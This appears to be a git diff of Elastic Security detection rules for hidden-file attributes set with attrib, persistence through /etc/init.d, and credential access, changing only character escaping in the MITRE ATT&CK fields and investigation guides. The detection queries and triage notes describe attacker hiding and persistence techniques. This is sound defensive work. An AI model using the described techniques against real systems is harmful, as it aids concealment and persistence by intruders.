 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n",
 "related_integrations": [
 {
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -104,7 +104,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json
index 3a4028a27d1..c3ee02c21a8 100644
--- a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_109.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Adding Hidden File Attribute via Attrib",
- "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not\n (process.parent.name: \"cmd.exe\" and\n process.command_line: \"attrib +R +H +S +A *.cui\" and\n process.parent.command_line: \"?:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \\\"?:\\\\WINDOWS\\\\system32\\\\*.bat\\\"\")\n",
 "related_integrations": [
 {
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -117,7 +117,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json
index 87dc1e16ea5..835902e4338 100644
--- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_104.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json
index 24f7ae7a5a6..416c119ac3f 100644
--- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json
index ffb0e954ed3..61d1b4a6564 100644
--- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_106.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json
index 125f7314825..2060cec2185 100644
--- a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_107.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json
index f0c170aa394..21ec14e9253 100644
--- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_102.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json
index ae9a210db60..9e487f483ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_103.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json
index 2c811c9c172..1b45c7a05d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/46f804f5-b289-43d6-a881-9387cf594f75_104.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json
index eae437474fe..f9de8bf9ff0 100644
--- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_1.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json
index 31d658cfdce..2e7a9e03dd1 100644
--- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_2.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json
index a2390d43227..8d5572f08d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_3.json
@@ -17,7 +17,7 @@
 "file.path",
 "process.name"
 ],
- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\") and not \nfile.extension : \"swp\"\n",
 "references": [
 "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json
index 8298a525e1e..b35af4e7f5a 100644
--- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_4.json
@@ -17,7 +17,7 @@
 "file.path",
 "process.name"
 ],
- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
